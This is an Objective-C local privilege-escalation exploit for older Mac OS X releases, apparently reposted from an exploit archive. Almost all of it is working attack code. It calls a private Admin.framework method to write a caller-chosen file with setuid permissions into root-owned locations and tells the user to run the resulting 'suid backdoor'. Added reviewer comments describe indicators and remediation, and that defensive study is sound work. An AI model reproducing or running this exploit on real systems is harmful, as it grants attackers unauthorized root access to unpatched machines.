Apple MAC OS X < 10.9/10 - Local Root Exploit
/* osx-irony-assist.m
 *
 * Copyright (c) 2010 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X < 10.9/10? local root exploit
 * by mu-b - June 2010
 *
 * - Tested on: Apple MACOS X <= 10.8.X
 *
 * $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $
 *
 * The most ironic backdoor perhaps in the history of backdoors.
 * Enabling 'Assistive Devices' in the 'Universal Access' preferences pane
 * uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled")
 * in a directory,
 *
 *   drwxr-xr-x 62 root wheel 2108 9 Apr 16:23 db
 *
 * without being root, now how did you do that?
 *
 * Copy what you want, wherever you want it, with whatever permissions you
 * desire, hmmm, backdoor?
 *
 * This is now fixed, so I guess this is OK :-)
 *
 * - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2010!@$!
 */

/* Reviewer notes (defensive reading of this listing)
 *
 * - Weakness shown: classes from the private Admin.framework are looked up
 *   by name at run time and asked to create a file whose contents, path and
 *   POSIX attributes all come from the caller. Per the author's header the
 *   write lands in a root-owned directory although the caller is not root.
 *   The component that performs the privileged write is not visible in this
 *   file; the authorization object passed to it is created empty and no
 *   rights are requested on it anywhere below, which suggests the privileged
 *   side did not verify the requester's entitlement -- confirm against the
 *   vendor advisory.
 * - Artefacts to look for: a file carrying the setuid bit that was not
 *   installed by the OS or a package (the attributes value 2377 below is
 *   decimal for octal 04511), executable content at BACKDOOR_BIN (presumably
 *   only a marker file on a clean system -- verify on a reference host), and
 *   processes other than the system preferences UI loading Admin.framework.
 * - Remediation: the header states the issue is fixed. The affected range
 *   given on this page is "< 10.9/10?" with testing on <= 10.8.X; the exact
 *   fixed release is not established by this page.
 */

#include <stdio.h>
#include <stdlib.h>
#import <SecurityFoundation/SFAuthorization.h>
#import <Foundation/Foundation.h>

/* where you want to write it! */
#define BACKDOOR_BIN "/var/db/.AccessibilityAPIEnabled"

/* Reads the file at spath and asks the Admin.framework UserUtilities class
 * to create a file at dpath with those contents and a fixed set of POSIX
 * permissions.
 *
 * spath: C string path of the file whose bytes are copied.
 * dpath: C string path passed to the framework as the destination.
 *
 * Returns EXIT_FAILURE if a class lookup, the source read or the attribute
 * dictionary creation fails; otherwise EXIT_SUCCESS. The result of the
 * create call itself is never inspected, so EXIT_SUCCESS does not show that
 * a file was written.
 */
int do_assistive_copy(const char *spath, const char *dpath) {
  /* Manual (pre-ARC) autorelease pool; no drain/release call appears in this
   * function, including on the early-return paths. */
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  /* Note the second declarator is `id *`, a pointer to an object pointer. */
  id authenticatorInstance, *userUtilsInstance;
  Class authenticatorClass, userUtilsClass;

  /* Silences the unused-variable warning for the pool. */
  (void) pool;

  /* The private framework is loaded by absolute path and its classes are
   * resolved by name, so nothing here is checked at compile or link time. */
  NSBundle *adminBundle = [NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"];
  authenticatorClass = [adminBundle classNamed:@"Authenticator"];
  if (!authenticatorClass) {
    fprintf (stderr, "* failed locating the Authenticator Class\n");
    return (EXIT_FAILURE);
  }
  printf ("* Found Authenticator Class!\n");

  authenticatorInstance = [authenticatorClass performSelector:@selector(sharedAuthenticator)];

  userUtilsClass = [adminBundle classNamed:@"UserUtilities"];
  if (!userUtilsClass) {
    fprintf (stderr, "* failed locating the UserUtilities Class\n");
    return (EXIT_FAILURE);
  }
  printf ("* found UserUtilities Class!\n");

  /* Allocated but never sent -init; the cast stores the object pointer as
   * `id *` so it can be dereferenced further down. */
  userUtilsInstance = (id *) [userUtilsClass alloc];

  /* A fresh authorization object; this file requests no rights on it. */
  SFAuthorization *authObj = [SFAuthorization authorization];
  /* The return value is only printed; it does not gate anything below. */
  OSStatus isAuthed = (OSStatus) [authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:) withObject:authObj];
  printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed);

  /* Whole source file is read into memory; the path is decoded as ASCII. */
  NSData *suidBin = [NSData dataWithContentsOfFile:[NSString stringWithCString:spath encoding:NSASCIIStringEncoding]];
  if (!suidBin) {
    fprintf (stderr, "* could not create [NSDATA] suidBin!\n");
    return (EXIT_FAILURE);
  }

  /* 2377 decimal == 04511 octal: setuid bit, owner r-x, group --x, other --x.
   * This mode on an unexpected file is the main on-disk indicator. */
  NSDictionary *createFileWithContentsDict = [NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377] forKey:(id)NSFilePosixPermissions];
  if (!createFileWithContentsDict) {
    fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n");
    return (EXIT_FAILURE);
  }

  /* Destination path is decoded as MacRoman; the CFString is never released
   * in this function. */
  CFStringRef writePath = CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);

  /* The warning is suppressed presumably because the selector is declared in
   * no imported header. The receiver is *userUtilsInstance, i.e. the first
   * pointer-sized word of the allocation above.
   * NOTE(review): presumably that word is the class (isa) pointer, making
   * this a message to the class rather than to an instance -- confirm. */
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wobjc-method-access"
  [*userUtilsInstance createFileWithContents:suidBin path:writePath attributes:createFileWithContentsDict];
#pragma clang diagnostic pop

  /* Printed unconditionally; the create call's outcome is not checked. */
  printf ("* now execute suid backdoor at %s\n", dpath);

  /* send the "Distributed Object Message" to the defaultCenter,
   * is this really necessary? (not for ownage) */
  [[NSDistributedNotificationCenter defaultCenter] postNotificationName:@"com.apple.accessibility.api" object:@"system.preferences" userInfo:nil deliverImmediately:YES];

  return (EXIT_SUCCESS);
}

/* Entry point: prints the banner, prints a usage line and exits with
 * EXIT_SUCCESS when no argument is given, otherwise returns the result of
 * do_assistive_copy() called with argv[1] as the source and the
 * argv[2] / BACKDOOR_BIN expression as the destination. */
int main (int argc, const char * argv[]) {
  printf ("Apple MACOS X < 10.9/10? local root exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n");

  if (argc <= 1) {
    fprintf (stderr, "Usage: %s <source> [destination]\n", argv[0]);
    exit (EXIT_SUCCESS);
  }

  return (do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
}
# 0day.today [2024-11-16] #